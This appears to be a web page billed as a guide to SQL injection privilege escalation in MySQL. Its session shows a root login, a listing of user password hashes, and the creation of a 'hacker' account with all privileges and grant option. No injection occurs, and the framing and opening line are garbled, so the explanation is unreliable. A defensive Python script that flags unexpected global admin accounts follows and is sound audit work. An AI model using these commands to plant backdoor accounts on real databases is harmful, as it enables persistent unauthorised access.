mysqld is an important component of the MySQL database, started during database development
This guide provides information on how to conduct a SQL injection attack to perform privilege escalation in MySQL databases. The goal is to enable the database driver user to increase their account’s privileges beyond its default rights.
$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 5.5.58-0+deb8u1 (Debian)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW GRANTS FOR current_user();
+--------------------------------------------------------------+
| Grants for root@localhost                                    |
+--------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT |
| OPTION                                                       |
+--------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT User, Password FROM mysql.user WHERE User LIKE '%';
+-----------+-------------------------------------------+
| User      | Password                                  |
+-----------+-------------------------------------------+
| root      | *A15C201711B011F7231BAE4FEF4F342C197E99FA |
| driver    | *A49C987051307BB8C2A244A21EEBD5965A3997C0 |
|           |                                           |
+-----------+-------------------------------------------+
2 rows in set (0.00 sec)

mysql> INSERT INTO mysql.user (Host,User,Password) VALUES ('localhost','hacker','*2D3647067158E8C86FE056E5AB5D5C3F5108948F');
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)
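When the commands above are executed, the hacker user obtains all privileges and can perform all operations with the root account, including installing rootkits and bypassing authentication.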
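
An audit check for the outcome shown above, as an added example that is not part of the original page: it parses GRANT statements in the form SHOW GRANTS prints and reports accounts that hold global ALL PRIVILEGES or GRANT OPTION but are not on an allowlist. The allowlist, the `app` database name and the sample lines are constructed assumptions.

```python
import re

# Matches the statement form printed by SHOW GRANTS, e.g.
# GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<tail>.*)$",
    re.IGNORECASE,
)

# Assumption: the only account expected to hold global admin rights.
ALLOWED_ADMINS = {("root", "localhost")}

def parse_grant(line):
    """Return a dict describing one GRANT statement, or None if unparsable."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return {
        "account": (m.group("user"), m.group("host")),
        "global": m.group("scope") == "*.*",
        "all_privs": bool(privs & {"ALL PRIVILEGES", "ALL"}),
        "grant_option": "WITH GRANT OPTION" in m.group("tail").upper(),
    }

def find_unexpected_admins(grant_lines, allowed=ALLOWED_ADMINS):
    """Flag accounts with global ALL PRIVILEGES or GRANT OPTION not allowlisted."""
    findings = set()
    for line in grant_lines:
        g = parse_grant(line)
        if g is None or not g["global"]:
            continue  # unparsable, or scoped to one database/table
        if (g["all_privs"] or g["grant_option"]) and g["account"] not in allowed:
            findings.add(g["account"])
    return sorted(findings)

# Constructed sample: SHOW GRANTS output gathered per account.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'driver'@'localhost' IDENTIFIED BY PASSWORD '<hash>'",
    "GRANT SELECT, INSERT ON `app`.* TO 'driver'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION",
]

if __name__ == "__main__":
    for user, host in find_unexpected_admins(SAMPLE_GRANTS):
        print(f"unexpected global admin: '{user}'@'{host}'")
```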